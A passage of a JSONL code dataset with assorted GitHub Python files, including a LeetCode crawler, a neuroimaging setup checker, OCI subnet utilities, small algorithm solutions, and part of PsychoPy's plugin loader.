_ in range(timeout):\n sleep(interval)\n response = self.get(url=f'https://{self.endpoint}/submissions/detail/{submission_id}/check/')\n\n if not response.json().get('state') == 'STARTED':\n break\n\n return SubmissionResult.parse_raw(response.text)\n\n def get_article_metadata_array(self, question_slug: str, only_official: bool = True):\n url = f'https://{self.endpoint}/graphql/'\n response = self.post(\n url=url,\n json={\n \"operationName\": \"questionSolutionVideoArticles\",\n \"variables\": {\n \"questionSlug\": question_slug,\n \"userInput\": \"\",\n \"tagSlugs\": [],\n },\n 'query': QUERY_SOLUTIONS\n }\n )\n\n for metadata in ArticleMetadataResponse.parse_raw(response.text).article_metadata_array:\n if only_official and not metadata.is_official:\n continue\n yield metadata\n\n def get_articles(self, question_slug: str, only_official: bool = True):\n url = f'https://{self.endpoint}/graphql/'\n for metadata in self.get_article_metadata_array(question_slug, only_official):\n response = self.post(\n url=url,\n json={\n \"operationName\": \"solutionDetailArticle\",\n \"variables\": {\n \"slug\": metadata.slug,\n \"orderBy\": \"DEFAULT\"\n },\n 'query': QUERY_SOLUTION\n }\n )\n article_response = ArticleResponse.parse_raw(response.text)\n yield Document(article_response.content)\n\n def get_solutions(self, question_slug: str, language: Optional[str] = None, only_official: bool = True):\n for markdown in self.get_articles(question_slug, only_official):\n for child in markdown.children:\n if not isinstance(child, CodeFence):\n continue\n\n if language and not child.language == language:\n continue\n\n if not child.children:\n continue\n\n element, *_ = child.children\n yield Solution(language=child.language, code=element.content)\n","repo_name":"zqmillet/leetcode-crawler","sub_path":"crawler/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34488012381","text":"\"\"\"\n - local.json - def-supervisor is not changed in the SBATCH command\n\"\"\"\nimport os\nimport shutil\nfrom sys import platform\n\nfrom setup.get_vars import Get_Vars\nfrom distribution.utilities import is_writable_directory, is_ENV_defined\nfrom distribution.setup_miniconda import (setup_miniconda, is_miniconda_installed,\n is_conda_module_installed, check_that_modules_are_installed)\nfrom distribution.utilities import ErrorMessages, makedir_ifnot_exist\nfrom distribution.distribution_definitions import DEFAULT\nfrom setup.interminal_setup import get_yes_no\n\n\nclass DistributionReady():\n\n def __init__(self, all_vars):\n\n self.credentials_home = all_vars.credentials_home # NIMB_HOME/credentials_paths.py\n self.locations = all_vars.location_vars # credentials_home/local.json + remotes.json\n self.stats_vars = all_vars.stats_vars\n self.proj_vars = all_vars.projects[all_vars.params.project] # credentials_home/project.json\n self.NIMB_HOME = self.locations[\"local\"][\"NIMB_PATHS\"][\"NIMB_HOME\"]\n self.NIMB_tmp = self.locations[\"local\"][\"NIMB_PATHS\"][\"NIMB_tmp\"]\n self.FREESURFER_HOME = self.locations['local']['FREESURFER']['FREESURFER_HOME']\n\n\n\n def check_ready(self):\n \"\"\"\n\n :return: False if there is something wrong\n Otherwise True\n \"\"\"\n if self.classify_ready():\n print(\"NIMB ready to perform classification\")\n else:\n ErrorMessages.error_classify()\n ready = False\n if self.fs_ready():\n print(\"NIMB ready to perform FreeSurfer processing\")\n else:\n ErrorMessages.error_fsready()\n ready = False\n conda_home = self.locations['local']['NIMB_PATHS']['conda_home']\n python3_run_cmd = self.locations['local']['PROCESSING']['python3_run_cmd']\n if conda_home in python3_run_cmd:\n print(' conda is used to run python. checking conda at: {}'.format(conda_home))\n if not is_miniconda_installed(conda_home):\n # # if has permission to install\n # if not is_writable_directory(conda_home):\n # print(\"miniconda path is not writable. Check the permission.\")\n # return False\n # # true: install setup_minicoda.py\n if get_yes_no('do you want to try and install conda? (may take up to 30 minutes) (y/n)') == 1:\n setup_miniconda(conda_home, self.NIMB_HOME)\n if check_that_modules_are_installed(conda_home, self.NIMB_HOME):\n print(\" conda has all modules installed\")\n else:\n ErrorMessages.error_conda()\n return False\n else:\n print(f\" using {python3_run_cmd} as command to run python\")\n\n\n # # check $FREESURFER_HOME exists\n # # source home\n # os.system(\"source ~/.bashrc\")\n # if not is_ENV_defined(\"$FREESURFER_HOME\"):\n # print(\"$FREESURFER_HOME is not defined\")\n # return False\n\n\n def chk_if_modules_are_installed(self, module_list):\n '''\n scripts checks that modules are installed inside the python environement\n Args:\n modules_list: list with required modules to be checked\n Return:\n True if all modules are installed, else Fale\n '''\n installed = True\n modules = []\n miss = []\n for module in module_list:\n try:\n modules.append(__import__(module))\n except ImportError as e:\n print(e)\n print(f'module {module} is not installed. Cannot continue process')\n miss.append(module)\n if miss:\n installed = False\n return installed, miss\n\n\n def get_user_paths_from_terminal(self):\n \"\"\"\n using terminal to ask for user inputs of variable.\n which one? need discuss.\n :return:\n \"\"\"\n # 1. get the inputs\n # 2. set the variable from inputs\n # 3. modify other variables\n pass\n\n\n def setting_up_local_computer(self):\n if platform.startswith('linux'):\n print(\"Currently only support setting up on Ubuntu-based system\")\n # do the job here\n self.setting_up_local_linux_with_freesurfer()\n elif platform in [\"win32\"]:\n print(\"The system is not fully supported in Windows OS. The application quits now .\")\n exit()\n else: # like freebsd,\n print(\"This platform is not supported\")\n exit()\n\n\n def setting_up_local_linux_with_freesurfer(self):\n \"\"\"\n install miniconda and require library\n :return:\n \"\"\"\n setup_miniconda(self.locations['local']['NIMB_PATHS']['conda_home'])\n\n\n def classify_ready(self):\n ready = True\n for p in (self.locations['local']['NIMB_PATHS']['NIMB_NEW_SUBJECTS'],\n self.NIMB_HOME, self.NIMB_tmp):\n if not os.path.exists(p):\n try:\n # if path start with ~\n makedir_ifnot_exist(p)\n except Exception as e:\n print(e)\n if not os.path.exists(p):\n ready = False\n break\n return ready\n\n\n def fs_ready(self):\n if self.locations['local']['FREESURFER']['install'] == 1:\n print('FreeSurfer is set to be installed on local computer')\n if len(self.FREESURFER_HOME) < 1:\n print(\"FREESURFER_HOME is missing.\")\n print(\" Please define FREESURFER_HOME in the nimb/local.json file\")\n return False\n if self.check_freesurfer_ready():\n SUBJECTS_DIR = self.locations['local']['FREESURFER']['SUBJECTS_DIR']\n if not os.path.exists(SUBJECTS_DIR):\n print(' creating path {}'.format(SUBJECTS_DIR))\n makedir_ifnot_exist(SUBJECTS_DIR)\n return self.fs_chk_fsaverage_ready(SUBJECTS_DIR)\n else:\n print('FreeSurfer is not installed yet.')\n print(' Please define FreeSurfer_install to 1 in the nimb/local.json file')\n return False\n\n\n def fs_chk_fsaverage_ready(self, SUBJECTS_DIR):\n self.fs_fsaverage_copy(SUBJECTS_DIR)\n if not os.path.exists(os.path.join(SUBJECTS_DIR,'fsaverage', 'xhemi')):\n print('fsaverage or fsaverage/xhemi is missing from SUBJECTS_DIR: {}'.format(SUBJECTS_DIR))\n return False\n else:\n return True\n\n\n def fs_fsaverage_copy(self, SUBJECTS_DIR):\n fsaverage_src_path = os.path.join(self.FREESURFER_HOME, \"subjects\", \"fsaverage\")\n fsaverage_dst_path = os.path.join(SUBJECTS_DIR, \"fsaverage\")\n fsaverage_dst_surf = os.path.join(fsaverage_dst_path, 'surf')\n fsaverage_dst_xhemi = os.path.join(fsaverage_dst_path, 'xhemi')\n\n if not os.path.exists(fsaverage_dst_xhemi) or\\\n not os.listdir(fsaverage_dst_surf):\n try:\n shutil.copytree(fsaverage_src_path, fsaverage_dst_path)\n except Exception as e:\n print(e)\n try:\n print(' removing older version')\n shutil.rmtree(fsaverage_dst_path)\n print(' copying a new version')\n shutil.copytree(fsaverage_src_path, fsaverage_dst_path)\n except Exception as e:\n print(e)\n\n\n def check_freesurfer_ready(self):\n \"\"\"\n check and install freesurfer\n :return:\n \"\"\"\n ready = False\n if not os.path.exists(os.path.join(self.FREESURFER_HOME, \"MCRv84\")):\n from .setup_freesurfer import SETUP_FREESURFER\n SETUP_FREESURFER(self.locations, DEFAULT)\n ready = True\n else:\n ready = True\n return ready\n\n\n def chk_if_ready_for_fs_glm(self):\n ready = True\n modules_list = ['pandas', 'xlrd', 'openpyxl', 'pathlib']\n if self.fs_ready():\n if not self.chk_if_modules_are_installed(modules_list):\n ready = False\n else:\n ready = False\n return ready \n\n\n def chk_if_ready_for_stats(self):\n \"\"\"will check if xlsx file for project is provided\n if all variables are provided\n if all paths for stats are created\n if NIMB is ready to perform statistical analysis\"\"\"\n ready = True\n modules_list = ['pandas', 'xlsxwriter', 'xlrd',\n 'openpyxl', 'pathlib', 'sklearn',\n 'matplotlib', 'seaborn']\n if not self.chk_if_modules_are_installed(modules_list):\n print('some python modules are missing: pandas, xlsxwriter, xlrd, openpyxl, pathlib')\n ready = False\n if not self.proj_vars[\"fname_groups\"]:\n print(f'group file is missing. Please check file: {self.credentials_home}/nimb/projects.json')\n ready = False\n return ready\n","repo_name":"alexhanganu/nimb","sub_path":"nimb/distribution/distribution_ready.py","file_name":"distribution_ready.py","file_ext":"py","file_size_in_byte":9170,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"42111187328","text":"'''\nGiven an encoded string, return its decoded string.\nThe encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.\nYou may assume that the input string is always valid; there are no extra white spaces, square brackets are well-formed, etc. Furthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. For example, there will not be input like 3a or 2[4]\n\nInput: s = \"3[a]2[bc]\"\nOutput: \"aaabcbc\"\n'''\n\n'''\n# Loop through character of string. Also intitilise stack along with empty string.\n# If current char is num then first will convert it to int and store into temp variable.\n# Once we see char is equal to '[' will push number at top of the stack.\n# If we find current element is alpha then store append top of the stack.\n# In case next element again alpha then append it with previously stored char and keep at top of the stack. Follow same process for all the consecutive alpha.\n# Once we reach at closing bracket ']' will pop previously store characters and pop number multiply it with characters and store append it with last element.\n# Follow same process to the end of the string.\n# At the end return all joined element in stack.\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n'''\n\nclass Solution:\n def decodeString(self, s: str) -> str:\n \n stack = ['']\n num = 0\n \n for ch in s:\n if ch.isdigit():\n num = num * 10 + int(ch)\n elif ch == '[':\n stack.append(num)\n num = 0\n stack.append(\"\")\n elif ch == ']':\n _str = stack.pop()\n repeat_count = stack.pop()\n stack[-1] += _str * repeat_count\n else:\n stack[-1] += ch\n \n return ''.join(stack)\n\n","repo_name":"ankitakotadiya/CoadingChallenge","sub_path":"Stack/DecodeString.py","file_name":"DecodeString.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13424292955","text":"activate_this = '/home/django/.virtualenvs/grid/bin/activate_this.py'\nexecfile(activate_this, dict(__file__=activate_this))\nimport os, sys, site\napache_configuration = os.path.dirname(__file__)\nprint('APACHE CONFIG DIRNAME: %s' % apache_configuration)\nproject = os.path.dirname(apache_configuration)\nworkspace = os.path.dirname(project)\nsys.path.append(apache_configuration)\nsys.path.append(project)\nsys.path.append(workspace)\nimport django\nos.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'\nfrom django.core.handlers.wsgi import WSGIHandler\napplication = WSGIHandler()\n\n","repo_name":"mjgallo/grid","sub_path":"django.wsgi","file_name":"django.wsgi","file_ext":"wsgi","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21771161298","text":"from urllib.request import urlretrieve\n\nurls=open(\"controlNegative.txt\")\n\ni=1\nfor url in urls:\n\ttry:\n\t\turlretrieve(url,\".\\\\controlNegative/\"+str(i)+\".jpg\")\n\t\ti += 1\n\t\tprint(i)\n\texcept:\n\t\tprint(\"error\"+str(i))","repo_name":"Mercuty/IsItCircle","sub_path":"getPosImages.py","file_name":"getPosImages.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27519174644","text":"# This file is part of pycloudlib. See LICENSE file for license information.\n\"\"\"Utilities for OCI images and instances.\"\"\"\nimport time\nfrom typing import TYPE_CHECKING, Optional\n\nfrom pycloudlib.errors import PycloudlibError\n\nif TYPE_CHECKING:\n import oci\n\n\ndef wait_till_ready(func, current_data, desired_state, sleep_seconds=1000):\n \"\"\"Wait until the results of function call reach a desired lifecycle state.\n\n Args:\n func: The function to call\n current_data: Structure containing the initial id and lifecycle state\n desired_state: Desired value of \"lifecycle_state\"\n sleep_seconds: How long to wait in seconds\n Returns:\n The updated version of the current_data\n \"\"\"\n for _ in range(sleep_seconds):\n current_data = func(current_data.id).data\n if current_data.lifecycle_state == desired_state:\n return current_data\n time.sleep(1)\n raise PycloudlibError(\n \"Expected {} state, but found {} after waiting {} seconds. \"\n \"Check OCI console for more details\".format(\n desired_state, current_data.lifecycle_state, sleep_seconds\n )\n )\n\n\ndef get_subnet_id(\n network_client: \"oci.core.VirtualNetworkClient\", # type: ignore\n compartment_id: str,\n availability_domain: str,\n vcn_name: Optional[str] = None,\n) -> str:\n \"\"\"Get a subnet id linked to `availability_domain`.\n\n From specified compartment select the first subnet linked to\n `availability_domain` or the first one.\n\n Args:\n network_client: Instance of VirtualNetworkClient.\n compartment_id: Compartment where the subnet has to belong\n availability_domain: Domain to look for subnet id in.\n vcn_name: Exact name of the VCN to use. If not provided, the newest\n VCN in the given compartment will be used.\n Returns:\n id of the subnet selected\n Raises:\n `Exception` if unable to determine `subnet_id` for\n `availability_domain`\n \"\"\"\n if vcn_name is not None: # if vcn_name specified, use that vcn\n vcns = network_client.list_vcns(\n compartment_id, display_name=vcn_name\n ).data\n if len(vcns) == 0:\n raise PycloudlibError(f\"Unable to determine vcn name: {vcn_name}\")\n if len(vcns) > 1:\n raise PycloudlibError(f\"Found multiple vcns with name: {vcn_name}\")\n vcn_id = vcns[0].id\n else: # if no vcn_name specified, use most recently created vcn\n vcn_id = network_client.list_vcns(compartment_id).data[0].id\n\n subnets = network_client.list_subnets(compartment_id, vcn_id=vcn_id).data\n subnet_id = None\n for subnet in subnets:\n if subnet.prohibit_internet_ingress: # skip subnet if it's private\n print(\"Ignoring private subnet: \" + subnet.id)\n continue\n print(\"Using public subnet: \" + subnet.id)\n if subnet.availability_domain == availability_domain:\n subnet_id = subnet.id\n break\n else:\n subnet_id = subnets[0].id\n if not subnet_id:\n raise PycloudlibError(\n f\"Unable to determine subnet id for domain: {availability_domain}\"\n )\n return subnet_id\n","repo_name":"canonical/pycloudlib","sub_path":"pycloudlib/oci/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"8381691676","text":"def solution(answers):\n answer = []\n check_1 = 0\n check_2 = 0\n check_3 = 0\n\n first = [1, 2, 3, 4, 5]\n second = [2, 1, 2, 3, 2, 4, 2, 5]\n third = [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]\n\n for i in range(len(answers)):\n if answers[i] == first[i % len(first)]:\n check_1 += 1\n if answers[i] == second[i % len(second)]:\n check_2 += 1\n if answers[i] == third[i % len(third)]:\n check_3 += 1\n\n resource = [check_1, check_2, check_3]\n\n for people, point in enumerate(resource):\n if point == max(resource):\n answer.append(people + 1)\n\n return answer\n\nif __name__ == '__main__':\n answers = [\n [1, 2, 3, 4, 5],\n [1, 3, 2, 4, 2]\n ]\n\n for ans in answers:\n print(solution(ans))","repo_name":"moonpiderman/all-of-algorithm","sub_path":"Exhaustive_Search/Mock_Test/42840.py","file_name":"42840.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37527577876","text":"def Pareto(*x):\n t = list(x)\n res = []\n for i in range(len(t)):\n f = 1\n for j in range(len(t)):\n if i == j:\n continue\n if (t[i][0] < t[j][0] and t[i][1] <= t[j][1]) or (t[i][0] <= t[j][0] and t[i][1] < t[j][1]):\n f = 0\n if f:\n res.append(t[i])\n return tuple(res)\n\nprint(Pareto(*eval(input())))\n\n","repo_name":"AlinaSeny/pythonprac","sub_path":"20231003/1/prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21432377138","text":"__all__ = ['loadPlugin', 'listPlugins', 'computeChecksum', 'startUpPlugins',\n 'pluginMetadata', 'pluginEntryPoints', 'scanPlugins',\n 'requirePlugin', 'isPluginLoaded', 'isStartUpPlugin']\n\nimport sys\nimport inspect\nimport collections\nimport hashlib\nimport importlib\nimport pkg_resources\n\nfrom psychopy import logging\nfrom psychopy.preferences import prefs\nimport psychopy.experiment.components as components\n\n# Keep track of plugins that have been loaded. Keys are plugin names and values\n# are their entry point mappings.\n_loaded_plugins_ = collections.OrderedDict() # use OrderedDict for Py2 compatibility\n\n# Entry points for all plugins installed on the system, this is populated by\n# calling `scanPlugins`. We are caching entry points to avoid having to rescan\n# packages for them.\n_installed_plugins_ = collections.OrderedDict()\n\n# Keep track of plugins that failed to load here\n_failed_plugins_ = []\n\n\ndef resolveObjectFromName(name, basename=None, resolve=True, error=True):\n \"\"\"Get an object within a module's namespace using a fully-qualified or\n relative dotted name.\n\n This function is mainly used to get objects associated with entry point\n groups, so entry points can be assigned to them. It traverses through\n objects along `name` until it reaches the end, then returns a reference to\n that object.\n\n You can also use this function to dynamically import modules and fully\n realize target names without needing to call ``import`` on intermediate\n modules. For instance, by calling the following::\n\n Window = resolveObjectFromName('psychopy.visual.Window')\n\n The function will first import `psychopy.visual` then get a reference to the\n unbound `Window` class within it and assign it to `Window`.\n\n Parameters\n ----------\n name : str\n Fully-qualified or relative name to the object (eg.\n `psychopy.visual.Window` or `.Window`). If name is relative, `basename`\n must be specified.\n basename : str, ModuleType or None\n If `name` is relative (starts with '.'), `basename` should be the\n `__name__` of the module or reference to the module itself `name` is\n relative to. Leave `None` if `name` is already fully qualified.\n resolve : bool\n If `resolve=True`, any name encountered along the way that isn't present\n will be assumed to be a module and imported. This guarantees the target\n object is fully-realized and reachable if the target is valid. If\n `False`, this function will fail if the `name` is not reachable and\n raise an error or return `None` if `error=False`.\n error : bool\n Raise an error if an object is not reachable. If `False`, this function\n will return `None` instead and suppress the error. This may be useful in\n cases where having access to the target object is a \"soft\" requirement\n and the program can still operate without it.\n\n Returns\n -------\n object\n Object referred to by the name. Returns `None` if the object is not\n reachable and `error=False`.\n\n Raises\n ------\n ModuleNotFoundError\n The base module the FQN is referring to has not been imported.\n NameError\n The provided name does not point to a valid object.\n ValueError\n A relative name was given to `name` but `basename` was not specified.\n\n Examples\n --------\n Get a reference to the `psychopy.visual.Window` class (will import `visual`\n in doing so)::\n\n Window = resolveObjectFromName('psychopy.visual.Window')\n\n Get the `Window` class if `name` is relative to `basename`::\n\n import psychopy.visual as visual\n Window = resolveObjectFromName('.Window', visual)\n\n Check if an object exists::\n\n Window = resolveObjectFromName(\n 'psychopy.visual.Window',\n resolve=False, # False since we don't want to import anything\n error=False) # suppress error, makes function return None\n\n if Window is None:\n print('Window has not been imported yet!')\n\n \"\"\"\n # make sure a basename is given if relative\n if name.startswith('.') and basename is None:\n raise ValueError('`name` specifies a relative name but `basename` is '\n 'not specified.')\n\n # if basename is a module object\n if inspect.ismodule(basename):\n basename = basename.__name__\n\n # get fqn and split\n fqn = (basename + name if basename is not None else name).split(\".\")\n\n # get the object the fqn refers to\n try:\n objref = sys.modules[fqn[0]] # base name\n except KeyError:\n raise ModuleNotFoundError(\n 'Base module cannot be found, has it been imported yet?')\n\n # walk through the FQN to get the object it refers to\n path = fqn[0]\n for attr in fqn[1:]:\n path += '.' + attr\n if not hasattr(objref, attr):\n # try importing the module\n if resolve:\n try:\n importlib.import_module(path)\n except ImportError:\n if not error: # return if suppressing error\n return None\n raise NameError(\n \"Specified `name` does not reference a valid object or \"\n \"is unreachable.\")\n else:\n if not error: # return None if we want to suppress errors\n return None\n raise NameError(\n \"Specified `name` does not reference a valid object or is \"\n \"unreachable.\")\n\n objref = getattr(objref, attr)\n\n return objref\n\n\ndef computeChecksum(fpath, method='sha256', writeOut=None):\n \"\"\"Compute the checksum hash/key for a given package.\n\n Authors of PsychoPy plugins can use this function to compute a checksum\n hash and users can use it to check the integrity of their packages.\n\n Parameters\n ----------\n fpath : str\n Path to the plugin package or file.\n method : str\n Hashing method to use, values are 'md5' or 'sha256'. Default is\n 'sha256'.\n writeOut : str\n Path to a text file to write checksum data to. If the file exists, the\n data will be written as a line at the end of the file.\n\n Returns\n -------\n str\n Checksum hash digested to hexadecimal format.\n\n Examples\n --------\n Compute a checksum for a package and write it to a file::\n\n with open('checksum.txt', 'w') as f:\n f.write(computeChecksum(\n '/path/to/plugin/psychopy_plugin-1.0-py3.6.egg'))\n\n \"\"\"\n methodObj = {'md5': hashlib.md5,\n 'sha256': hashlib.sha256}\n\n hashobj = methodObj[method]()\n with open(fpath, \"rb\") as f:\n chunk = f.read(4096)\n while chunk != b\"\":\n chunk = f.read(4096)\n hashobj.update(chunk)\n\n checksumStr = hashobj.hexdigest()\n\n if writeOut is not None:\n with open(writeOut, 'a') as f:\n f.write('\\n' + checksumStr)\n\n return checksumStr\n\n\ndef scanPlugins():\n \"\"\"Scan the system for installed plugins.\n\n This function scans installed packages for the current Python environment\n and looks for ones that specify PsychoPy entry points in their metadata.\n Afterwards, you can call :func:`listPlugins()` to list them and\n `loadPlugin()` to load them into the current session. This function is\n called automatically when PsychoPy starts, so you do not need to call this\n unless packages have been added since the session began.\n\n \"\"\"\n global _installed_plugins_\n _installed_plugins_ = {} # clear installed plugins\n\n # find all packages with entry points defined\n pluginEnv = pkg_resources.Environment() # supported by the platform\n dists, _ = pkg_resources.working_set.find_plugins(pluginEnv)\n\n for dist in dists:\n entryMap = dist.get_entry_map()\n if any([i.startswith('psychopy') for i in entryMap.keys()]):\n logging.debug('Found plugin `{}` at location `{}`.'.format(\n dist.project_name, dist.location))\n _installed_plugins_[dist.project_name] = entryMap\n\n\ndef listPlugins(which='all'):\n \"\"\"Get a list of installed or loaded PsychoPy plugins.\n\n This function lists either all potential plugin packages installed on the\n system, those registered to be loaded automatically when PsychoPy starts, or\n those that have been previously loaded successfully this session.\n\n Parameters\n ----------\n which : str\n Category to list plugins. If 'all', all plugins installed on the system\n will be listed, whether they have been loaded or not. If 'loaded', only\n plugins that have been previously loaded successfully this session will\n be listed. If 'startup', plugins registered to be loaded when a PsychoPy\n session starts will be listed, whether or not they have been loaded this\n session. If 'unloaded', plugins that have not been loaded but are\n installed will be listed. If 'failed', returns a list of plugin names\n that attempted to load this session but failed for some reason.\n\n Returns\n -------\n list\n Names of PsychoPy related plugins as strings. You can load all installed\n plugins by passing list elements to `loadPlugin`.\n\n See Also\n --------\n loadPlugin : Load a plugin into the current session.\n\n Examples\n --------\n Load all plugins installed on the system into the current session (assumes\n all plugins don't require any additional arguments passed to them)::\n\n for plugin in plugins.listPlugins():\n plugins.loadPlugin(plugin)\n\n If certain plugins take arguments, you can do this give specific arguments\n when loading all plugins::\n\n pluginArgs = {'some-plugin': (('someArg',), {'setup': True, 'spam': 10})}\n for plugin in plugins.listPlugins():\n try:\n args, kwargs = pluginArgs[plugin]\n plugins.loadPlugin(plugin, *args, **kwargs)\n except KeyError:\n plugins.loadPlugin(plugin)\n\n Check if a plugin package named `plugin-test` is installed on the system and\n has entry points into PsychoPy::\n\n if 'plugin-test' in plugins.listPlugins():\n print(\"Plugin installed!\")\n\n Check if all plugins registered to be loaded on startup are currently\n active::\n\n if not all([p in listPlugins('loaded') for p in listPlugins('startup')]):\n print('Please restart your PsychoPy session for plugins to take effect.')\n\n \"\"\"\n if which not in ('all', 'startup', 'loaded', 'unloaded', 'failed'):\n raise ValueError(\"Invalid value specified to argument `which`.\")\n\n if which == 'loaded': # only list plugins we have already loaded\n return list(_loaded_plugins_.keys())\n elif which == 'startup':\n return list(prefs.general['startUpPlugins']) # copy this\n elif which == 'unloaded':\n return [p for p in listPlugins('all') if p in listPlugins('loaded')]\n elif which == 'failed':\n return list(_failed_plugins_) # copy\n else:\n return list(_installed_plugins_.keys())\n\n\ndef isPluginLoaded(plugin):\n \"\"\"Check if a plugin has been previously loaded successfully by a\n :func:`loadPlugin` call.\n\n Parameters\n ----------\n plugin : str\n Name of the plugin package to check if loaded. This usually refers to\n the package or project name.\n\n Returns\n -------\n bool\n `True` if a plugin was successfully loaded and active, else `False`.\n\n See Also\n --------\n loadPlugin : Load a plugin into the current session.\n\n \"\"\"\n return plugin in listPlugins(which='loaded')\n\n\ndef isStartUpPlugin(plugin):\n \"\"\"Check if a plugin is registered to be loaded when PsychoPy starts.\n\n Parameters\n ----------\n plugin : str\n Name of the plugin package to check. This usually refers to the package\n or project name.\n\n Returns\n -------\n bool\n `True` if a plugin is registered to be loaded when a PsychoPy session\n starts, else `False`.\n\n Examples\n --------\n Check if a plugin was loaded successfully at startup::\n\n pluginName = 'psychopy-plugin'\n if isStartUpPlugin(pluginName) and isPluginLoaded(pluginName):\n print('Plugin successfully loaded at startup.')\n\n \"\"\"\n return plugin in listPlugins(which='startup')\n\n\ndef loadPlugin(plugin, *args, **kwargs):\n \"\"\"Load a plugin to extend PsychoPy.\n\n Plugins are packages which extend upon PsychoPy's existing functionality by\n dynamically importing code at runtime, without modifying the existing\n installation files. Plugins create or redefine objects in the namespaces\n of modules (eg. `psychopy.visual`) and unbound classes, allowing them to be\n used as if they were part of PsychoPy. In some cases, objects exported by\n plugins will be registered for a particular function if they define entry\n points into specific modules.\n\n Plugins are simply Python packages,`loadPlugin` will search for them in\n directories specified in `sys.path`. Only packages which define entry points\n in their metadata which pertain to PsychoPy can be loaded with this\n function. This function also permits passing optional arguments to a\n callable object in the plugin module to run any initialization routines\n prior to loading entry points.\n\n This function is robust, simply returning `True` or `False` whether a\n plugin has been fully loaded or not. If a plugin fails to load, the reason\n for it will be written to the log as a warning or error, and the application\n will continue running. This may be undesirable in some cases, since features\n the plugin provides may be needed at some point and would lead to undefined\n behavior if not present. If you want to halt the application if a plugin\n fails to load, consider using :func:`requirePlugin`.\n\n It is advised that you use this function only when using PsychoPy as a\n library. If using the builder or coder GUI, it is recommended that you use\n the plugin dialog to enable plugins for PsychoPy sessions spawned by the\n experiment runner. However, you can still use this function if you want to\n load additional plugins for a given experiment, having their effects\n isolated from the main application and other experiments.\n\n Parameters\n ----------\n plugin : str\n Name of the plugin package to load. This usually refers to the package\n or project name.\n *args, **kwargs\n Optional arguments and keyword arguments to pass to the plugin's\n `__register__` function.\n\n Returns\n -------\n bool\n `True` if the plugin has valid entry points and was loaded successfully.\n Also returns `True` if the plugin was already loaded by a previous\n `loadPlugin` call this session, this function will have no effect in\n this case. `False` is returned if the plugin defines no entry points\n specific to PsychoPy or crashed (an error is logged).\n\n Warnings\n --------\n Make sure that plugins installed on your system are from reputable sources,\n as they may contain malware! PsychoPy is not responsible for undefined\n behaviour or bugs associated with the use of 3rd party plugins.\n\n See Also\n --------\n listPlugins : Search for and list installed or loaded plugins.\n requirePlugin : Require a plugin be previously loaded.\n\n Examples\n --------\n Load a plugin by specifying its package/project name::\n\n loadPlugin('psychopy-hardware-box')\n\n You can give arguments to this function which are passed on to the plugin::\n\n loadPlugin('psychopy-hardware-box', switchOn=True, baudrate=9600)\n\n You can use the value returned from `loadPlugin` to determine if the plugin\n is installed and supported by the platform::\n\n hasPlugin = loadPlugin('psychopy-hardware-box')\n if hasPlugin:\n # initialize objects which require the plugin here ...\n\n \"\"\"\n global _loaded_plugins_, _failed_plugins_\n\n if isPluginLoaded(plugin):\n logging.info('Plugin `{}` already loaded. Skipping.'.format(plugin))\n return True # already loaded, return True\n\n try:\n entryMap = _installed_plugins_[plugin]\n except KeyError:\n logging.warning(\n 'Package `{}` does not appear to be a valid plugin. '\n 'Skipping.'.format(plugin))\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n\n if not any([i.startswith('psychopy') for i in entryMap.keys()]):\n logging.warning(\n 'Specified package `{}` defines no entry points for PsychoPy. '\n 'Skipping.'.format(plugin))\n\n if plugin not in _failed_plugins_.keys():\n _failed_plugins_.append(plugin)\n\n return False # can't do anything more here, so return\n\n # go over entry points, looking for objects explicitly for psychopy\n validEntryPoints = collections.OrderedDict() # entry points to assign\n for fqn, attrs in entryMap.items():\n if not fqn.startswith('psychopy'):\n continue\n\n # forbid plugins from modifying this module\n if fqn.startswith('psychopy.plugins') or \\\n (fqn == 'psychopy' and 'plugins' in attrs):\n logging.error(\n \"Plugin `{}` declares entry points into the `psychopy.plugins` \"\n \"which is forbidden. Skipping.\")\n\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n\n # Get the object the fully-qualified name points to the group which the\n # plugin wants to modify.\n targObj = resolveObjectFromName(fqn, error=False)\n if targObj is None:\n logging.error(\n \"Plugin `{}` specified entry point group `{}` that does not \"\n \"exist or is unreachable.\")\n\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n\n validEntryPoints[fqn] = []\n\n # Import modules assigned to entry points and load those entry points.\n # We don't assign anything to PsychoPy's namespace until we are sure\n # that the entry points are valid. This prevents plugins from being\n # partially loaded which can cause all sorts of undefined behaviour.\n for attr, ep in attrs.items():\n # Load the module the entry point belongs to, this happens\n # anyways when .load() is called, but we get to access it before\n # we start binding. If the module has already been loaded, don't\n # do this again.\n if ep.module_name not in sys.modules:\n # Do stuff before loading entry points here, any executable code\n # in the module will run to configure it.\n try:\n imp = importlib.import_module(ep.module_name)\n except (ModuleNotFoundError, ImportError):\n logging.error(\n \"Plugin `{}` entry point requires module `{}`, but it\"\n \"cannot be imported.\".format(plugin, ep.module_name))\n\n if plugin not in _failed_plugins_:\n _failed_plugins_.append(plugin)\n\n return False\n\n # call the register function, 